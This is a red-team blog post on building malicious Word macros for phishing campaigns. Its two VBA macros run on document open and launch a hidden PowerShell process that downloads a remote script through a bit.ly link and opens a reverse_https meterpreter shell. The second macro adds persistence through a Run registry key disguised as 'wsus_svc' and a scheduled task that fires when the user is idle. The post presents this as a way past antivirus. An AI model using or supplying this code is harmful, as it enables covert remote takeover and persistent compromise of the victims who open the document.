Ditching Migration with the Word Macro

Intro

So I've recently been experimenting with Microsoft Word Macros lately after a co-worker of mine ran into some issues with heuristics AV and process migration during a phishing campaign. Specifically, he had to migrate his meterpreter to a new process in order for his session to stay alive when the targeted user closed the macro embedded Word Document.

I started to think "Ok, if the migration is the problem then how can we avoid having to migrate to a new process all together?"

Enter WshShell's Run method

Directly from the MSDN page: "The Run method starts a program running in a new Windows process."

I don't know about you but that sounds exactly like the solution we were looking for. It will create a completely new Windows process that is not tied into the not so reliable process our macro embedded word document was running in.

The only curiosity I had after was once the process is started will the targeted user see anything on their end? Further research into the MSDN page shows the following arguments

object

WshShell object.

strCommand

String value indicating the command line you want to run. You must include any parameters you want to pass to the executable file.

intWindowStyle

Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.

bWaitOnReturn

Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script. If set to true, script execution halts until the program finishes, and Run returns any error code returned by the program. If set to false (the default), the Run method returns immediately after starting the program, automatically returning 0 (not to be interpreted as an error code).

The argument intWindowStyle looked like an interesting option and after looking further into the MSDN I discovered that placing a 0 for this option would hide the new process so the targeted user would be none the wiser.

The Modified Macro 

Using the knowledge gained above it was time to put the plan into action. After some testing and experimentation I finally came up with the below macro that makes use of Matt Graeber's Invoke-Shellcode:

 Sub shellexec()  
   Dim wsh As Object  
   Set wsh = VBA.CreateObject("WScript.Shell")  
   Dim windowStyle As Integer: windowStyle = 0  
   Dim errorCode As Integer  
     
   
   wshCreate.wsh.Run "powershell.exe -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force", windowStyle  
   
 End Sub  
 Sub AutoOpen()  
   shellexec  
 End Sub  
 Sub Workbook_Open()  
   shellexec  
 End Sub  

The above code will execute once the targeted user selects "Enable Content" within a Microsoft Word document. This will create a new process and use the Invoke-Shellcode powershell script to send a reverse_https meterpreter to the specified listener. Once run, we will have a separate stable powershell.exe process that will be unaffected by the targeted user closing the word document with out using migration. Take that AV!

Taking it One Step Further

With the ability to execute arbitrary Windows commands on the remote system I  began to think of different tasks that would be fun to have automated. The first thing that entered my mind was persistence. I also wanted to have this established persistence to not add any additional binary files to the remote system. I decided that I would like an entry into the remote systems registry that would initiate a session upon the current user's login and to also schedule a task to initiate a session for every 1 minute of user idle time.

The below is the Macro that was created for this:

 Sub shellexec()  
   Dim wsh As Object  
   Set wsh = VBA.CreateObject("WScript.Shell")  
   Dim windowStyle As Integer: windowStyle = 0  
   Dim errorCode As Integer  
     
   
   wshCreate.wsh.Run "powershell.exe -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force", windowStyle  
   
   wsh.Run "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /f /t REG_SZ /v wsus_svc /d ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force""", windowStyle  
   
   wsh.Run "schtasks /create /tn wsus_svc /tr ""powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://bit.ly/NHpT5c'''))';Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force"" /sc onidle /i 1", windowStyle  
 End Sub  
 Sub AutoOpen()  
   shellexec  
 End Sub  
 Sub Workbook_Open()  
   shellexec  
 End Sub  

Now once your targeted user enables the mysterious content of a downloaded word document you will automatically have persistence established faster than you can type sessions -i 1.

Links:

MSDN WshShell: http://msdn.microsoft.com/en-us/library/d5fk67ky(v=vs.84).aspx
PowerSploit: https://github.com/mattifestation/PowerSploit